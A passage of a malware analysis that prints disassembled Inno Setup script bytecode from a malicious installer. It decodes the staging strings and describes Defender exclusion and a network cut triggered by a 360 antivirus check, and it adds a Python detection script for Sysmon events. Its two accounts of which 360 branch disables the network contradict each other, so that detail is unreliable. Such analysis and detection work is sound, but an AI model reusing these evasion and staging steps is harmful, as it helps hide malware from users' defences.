Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(21)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(102)    assign Var17[2], S32(117)    assign Var17[3], S32(110)    assign Var17[4], S32(122)    assign Var17[5], S32(105)    assign Var17[6], S32(112)    assign Var17[7], S32(46)    assign Var17[8], S32(101)    assign Var17[9], S32(120)    assign Var17[10], S32(101)    assign Var17[11], S32(34)    assign Var17[12], S32(32)    assign Var17[13], S32(38)    assign Var17[14], S32(38)    assign Var17[15], S32(32)    assign Var17[16], S32(100)    assign Var17[17], S32(101)    assign Var17[18], S32(108)    assign Var17[19], S32(32)    assign Var17[20], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype 
Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 
16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(9)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    pushtype Type30 ; 
StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype S32 ; StackCount = 17    assign Var17, S32(7)    pushvar Var16 ; StackCount = 18    call SETARRAYLENGTH    pop ; StackCount = 17    pop ; StackCount = 16    assign Var16[0], S32(99)    assign Var16[1], S32(109)    assign Var16[2], S32(100)    assign Var16[3], S32(46)    assign Var16[4], S32(101)    assign Var16[5], S32(120)    assign Var16[6], S32(101)    assign Var15, Var16    pop ; StackCount = 15    pushvar Var14 ; StackCount = 16    call STRFROMCODE    pop ; StackCount = 15    pop ; StackCount = 14    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    call OBFUSCATEDEXTRACT    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(51)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)    assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(120)    assign Var9[27], S32(56)    assign Var9[28], S32(54)    assign Var9[29], S32(45)    assign Var9[30], S32(77)    assign Var9[31], S32(105)    assign 
Var9[32], S32(99)    assign Var9[33], S32(114)    assign Var9[34], S32(111)    assign Var9[35], S32(115)    assign Var9[36], S32(111)    assign Var9[37], S32(102)    assign Var9[38], S32(116)    assign Var9[39], S32(45)    assign Var9[40], S32(87)    assign Var9[41], S32(105)    assign Var9[42], S32(110)    assign Var9[43], S32(100)    assign Var9[44], S32(111)    assign Var9[45], S32(119)    assign Var9[46], S32(115)    assign Var9[47], S32(100)    assign Var9[48], S32(97)    assign Var9[49], S32(116)    assign Var9[50], S32(97)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var2 ; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(36)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)    assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(83)    assign Var9[27], S32(101)    assign Var9[28], S32(114)    assign Var9[29], S32(118)    assign Var9[30], S32(101)    assign Var9[31], S32(114)    assign Var9[32], S32(46)    assign Var9[33], S32(108)    assign Var9[34], S32(111)    assign Var9[35], S32(103)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var3 
; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype WideString ; StackCount = 8    assign Var8, Var2    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(11)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(83)    assign Var11[2], S32(101)    assign Var11[3], S32(114)    assign Var11[4], S32(118)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(46)    assign Var11[8], S32(108)    assign Var11[9], S32(111)    assign Var11[10], S32(103)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var4, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var2    pushvar Var8 ; StackCount = 10    call FORCEDIRECTORIES    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var3    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_435a    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_4326    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call DELETEFILE    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_4326:    pushtype BOOLEAN ; 
StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushtype UnicodeString_2 ; StackCount = 10    assign Var10, Var3    pushvar Var8 ; StackCount = 11    call RENAMEFILE    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_435a:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(26)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var11[25], S32(92)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(9)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(115)    assign Var11[1], S32(101)    assign Var11[2], S32(116)    assign Var11[3], S32(117)    assign 
Var11[4], S32(112)    assign Var11[5], S32(46)    assign Var11[6], S32(101)    assign Var11[7], S32(120)    assign Var11[8], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var6, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var6    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_47cd    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(5)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var6    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; 
StackCount = 8    pop ; StackCount = 7loc_47cd:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(25)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(8)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(109)    assign Var11[2], S32(101)    assign Var11[3], S32(110)    assign Var11[4], S32(46)    assign Var11[5], S32(101)    assign Var11[6], S32(120)    assign Var11[7], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; 
StackCount = 8    assign Var5, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var5    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_4c1a    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var5    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_4c1a:    ret
This function contains several ASCII-code arrays that are used to build strings and carry out various operations.
The decoded results of all the arrays and their corresponding strings are listed below (the backslashes, code 92, are restored):

  1. First array (12 bytes)
     ASCII codes: 47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 34
     String: "/c copy /b ""

  2. Second array (25 bytes)
     ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115
     String: "C:\Users\Public\Documents"

  3. Third array (13 bytes)
     ASCII codes: 92, 117, 110, 122, 105, 112, 46, 51, 34, 32, 43, 32, 34
     String: "\unzip.3" + ""

  4. Fourth array (11 bytes)
     ASCII codes: 92, 117, 110, 122, 105, 112, 46, 50, 34, 32, 34
     String: "\unzip.2" ""

  5. Fifth array (21 bytes)
     ASCII codes: 92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101, 34, 32, 38, 38, 32, 100, 101, 108, 32, 34
     String: "\funzip.exe" && del ""

  6. Sixth array (9 bytes)
     ASCII codes: 92, 117, 110, 122, 105, 112, 46, 50, 34
     String: "\unzip.2""

  7. Seventh array (7 bytes)
     ASCII codes: 99, 109, 100, 46, 101, 120, 101
     String: "cmd.exe"

  8. Eighth array (51 bytes)
     ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 120, 56, 54, 45, 77, 105, 99, 114, 111, 115, 111, 102, 116, 45, 87, 105, 110, 100, 111, 119, 115, 100, 97, 116, 97
     String: "C:\Users\Public\Documents\x86-Microsoft-Windowsdata"

  9. Ninth array (36 bytes)
     ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 83, 101, 114, 118, 101, 114, 46, 108, 111, 103
     String: "C:\Users\Public\Documents\Server.log"

  10. Tenth array (11 bytes)
      ASCII codes: 92, 83, 101, 114, 118, 101, 114, 46, 108, 111, 103
      String: "\Server.log"

  11. Eleventh array (26 bytes)
      ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92
      String: "C:\Users\Public\Documents\"

  12. Twelfth array (9 bytes)
      ASCII codes: 115, 101, 116, 117, 112, 46, 101, 120, 101
      String: "setup.exe"

  13. Thirteenth array (8 bytes)
      ASCII codes: 92, 109, 101, 110, 46, 101, 120, 101
      String: "\men.exe"

The function performs the following actions:
  1. Runs cmd.exe /c copy /b /y to join C:\Users\Public\Documents\unzip.3 and unzip.2 into funzip.exe
  2. Deletes the files unzip.3 and unzip.2
  3. Calls functions such as ADDDEFENDEREXCLUSION and OBFUSCATEDEXTRACT (if the 360Tray.exe process exists, it first calls ADDDEFENDEREXCLUSION and DISABLENETWORKADAPTERS to cut the network connection)
  4. Uses C:\Users\Public\Documents as the working directory and creates the x86-Microsoft-Windowsdata subdirectory, i.e. C:\Users\Public\Documents\x86-Microsoft-Windowsdata
  5. Uses the EXEC function to run files such as setup.exe and men.exe, i.e. C:\Users\Public\Documents\setup.exe and C:\Users\Public\Documents\men.exe
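As an added example for this write-up (not code from the original analysis or from the sample), the detection logic below checks constructed Sysmon-style process-creation records for the staging steps just listed: the copy /b re-assembly of split fragments into an executable, binaries started out of C:\Users\Public\Documents, and the netsh firewall block-all policy that the DISABLENETWORKADAPTERS function described later on this page issues. The "Key=Value|Key=Value" record layout, the parent/child paths and every event are assumptions constructed for the example.

```python
"""Detection logic for the staging chain the IFPS script performs.

Added example for this write-up, not part of the original analysis or the
sample. It matches the behaviour described above (cmd.exe joining split
fragments with "copy /b" into an executable, binaries started out of
C:\\Users\\Public\\Documents, and the netsh firewall change used to cut the
network) over constructed Sysmon-style process-creation records. The
"Key=Value|Key=Value" record layout and all SAMPLE_EVENTS are invented here;
field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine).
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

PUBLIC_DOCUMENTS = "c:\\users\\public\\documents\\"

# Constructed events: the first three mimic the chain above under one parent,
# the last two are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    r'Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Users\Admin\Downloads\installer.exe'
    r'|CommandLine=cmd.exe /c copy /b "C:\Users\Public\Documents\unzip.3" + '
    r'"C:\Users\Public\Documents\unzip.2" "C:\Users\Public\Documents\funzip.exe" '
    r'&& del "C:\Users\Public\Documents\unzip.2"',
    r'Image=C:\Users\Public\Documents\setup.exe|ParentImage=C:\Users\Admin\Downloads\installer.exe'
    r'|CommandLine=C:\Users\Public\Documents\setup.exe',
    r'Image=C:\Windows\System32\netsh.exe|ParentImage=C:\Users\Admin\Downloads\installer.exe'
    r'|CommandLine=netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound',
    r'Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe'
    r'|CommandLine=cmd.exe /c copy /b C:\build\part1.bin + C:\build\part2.bin C:\build\firmware.bin',
    r'Image=C:\Program Files\7-Zip\7z.exe|ParentImage=C:\Windows\explorer.exe'
    r'|CommandLine=7z.exe x archive.7z',
]

# A field runs until the next "|Key=" or the end of the record, so a
# CommandLine that itself contains '=' is not cut short.
FIELD = re.compile(r"(\w+)=(.*?)(?=\|\w+=|$)")


def parse_event(line: str) -> Dict[str, str]:
    """Split a flattened record into its fields."""
    return dict(FIELD.findall(line))


def rule_copy_b_to_exe(ev: Dict[str, str]) -> bool:
    # cmd.exe re-assembling split fragments into an .exe; the script joins
    # unzip.3 + unzip.2 into funzip.exe exactly this way.
    return ev.get("Image", "").lower().endswith("\\cmd.exe") and bool(
        re.search(r"copy\s+/b\b.*\+.*\.exe\b", ev.get("CommandLine", ""), re.I)
    )


def rule_exec_from_public_documents(ev: Dict[str, str]) -> bool:
    # setup.exe / men.exe are launched from the world-writable Public profile.
    return ev.get("Image", "").lower().startswith(PUBLIC_DOCUMENTS)


def rule_firewall_block_all(ev: Dict[str, str]) -> bool:
    # netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
    cmd = ev.get("CommandLine", "").lower()
    return ev.get("Image", "").lower().endswith("\\netsh.exe") and all(
        w in cmd for w in ("advfirewall", "firewallpolicy", "blockinbound", "blockoutbound")
    )


RULES = {
    "copy_b_to_exe": rule_copy_b_to_exe,
    "exec_from_public_documents": rule_exec_from_public_documents,
    "firewall_block_all": rule_firewall_block_all,
}


def evaluate(ev: Dict[str, str]) -> List[str]:
    """Names of every rule that fires for one event."""
    return [name for name, rule in RULES.items() if rule(ev)]


def analyse(lines: List[str]) -> Tuple[List[List[str]], Dict[str, Set[str]]]:
    """Per-event hits, plus parents under which two or more distinct rules
    fired: a single hit is a weak signal, the chain under one parent is the alert."""
    hits: List[List[str]] = []
    by_parent: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        names = evaluate(ev)
        hits.append(names)
        by_parent[ev.get("ParentImage", "").lower()].update(names)
    chains = {p: r for p, r in by_parent.items() if len(r) >= 2}
    return hits, chains


if __name__ == "__main__":
    per_event, chains = analyse(SAMPLE_EVENTS)
    for line, names in zip(SAMPLE_EVENTS, per_event):
        print(names or "-", parse_event(line)["Image"])
    for parent, rules in chains.items():
        print("ALERT staged-installer chain under", parent, sorted(rules))
```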

The function checks for the 360 main-protection process and, if it is present, disconnects the network. In detail: it calls the script's IS360PROCESSRUNNING function to determine whether the 360 main-protection process "360Tray.exe" exists and branches on the result. Checking whether the 360 process is running:

    ; lines 8-14
    pushtype BOOLEAN ; StackCount = 8
    pushvar Var8 ; StackCount = 9
    call INITIALIZESETUP ; initialise setup
    pop ; StackCount = 8
    pop ; StackCount = 7
    pushvar Var1 ; StackCount = 8
    call IS360PROCESSRUNNING ; check whether a 360 Safeguard process is running
    pop ; StackCount = 7
Checking the result and the conditional jump:
    ; lines 15-22
    pushtype BOOLEAN ; StackCount = 8
    assign Var8, Var1 ; copy the return value of IS360PROCESSRUNNING (held in Var1) into Var8 for the test below
    setz Var8 ; test whether Var8 is false (0)
    sfz Var8 ; based on the sfz result, if Var8 is false (i.e. no 360 process is running) jump to label loc_263f
    pop ; StackCount = 7
    jf loc_263f
Execution paths:
  1. If a 360 process is running: execution continues with the current block (from line 23), which then calls "ADDDEFENDEREXCLUSION" (adds a Windows Defender exclusion) and "OBFUSCATEDEXTRACT"
  2. If no 360 process is running: execution jumps to label loc_263f, which first calls "ADDDEFENDEREXCLUSION" (adds a Windows Defender exclusion) and "DISABLENETWORKADAPTERS" (cuts the network)
Let us look at the "IS360PROCESSRUNNING" function:
.function(export) BOOLEAN IS360PROCESSRUNNING()        pushtype Variant ; StackCount = 1        pushtype Variant ; StackCount = 2        pushtype Variant ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype UnicodeString_2 ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype UnicodeString_2 ; StackCount = 7        assign RetVal, BOOLEAN(0)        starteh null, loc_8a1, null, loc_8af        pushtype IDISPATCH ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype Type30 ; StackCount = 10        pushtype Type30 ; StackCount = 11        pushtype S32 ; StackCount = 12        assign Var12, S32(26)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(87)        assign Var11[1], S32(66)        assign Var11[2], S32(69)        assign Var11[3], S32(77)        assign Var11[4], S32(83)        assign Var11[5], S32(99)        assign Var11[6], S32(114)        assign Var11[7], S32(105)        assign Var11[8], S32(112)        assign Var11[9], S32(116)        assign Var11[10], S32(105)        assign Var11[11], S32(110)        assign Var11[12], S32(103)        assign Var11[13], S32(46)        assign Var11[14], S32(83)        assign Var11[15], S32(87)        assign Var11[16], S32(66)        assign Var11[17], S32(69)        assign Var11[18], S32(77)        assign Var11[19], S32(76)        assign Var11[20], S32(111)        assign Var11[21], S32(99)        assign Var11[22], S32(97)        assign Var11[23], S32(116)        assign Var11[24], S32(111)        assign Var11[25], S32(114)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10        pop ; StackCount = 9        pushvar Var8 ; StackCount = 10        call CREATEOLEOBJECT        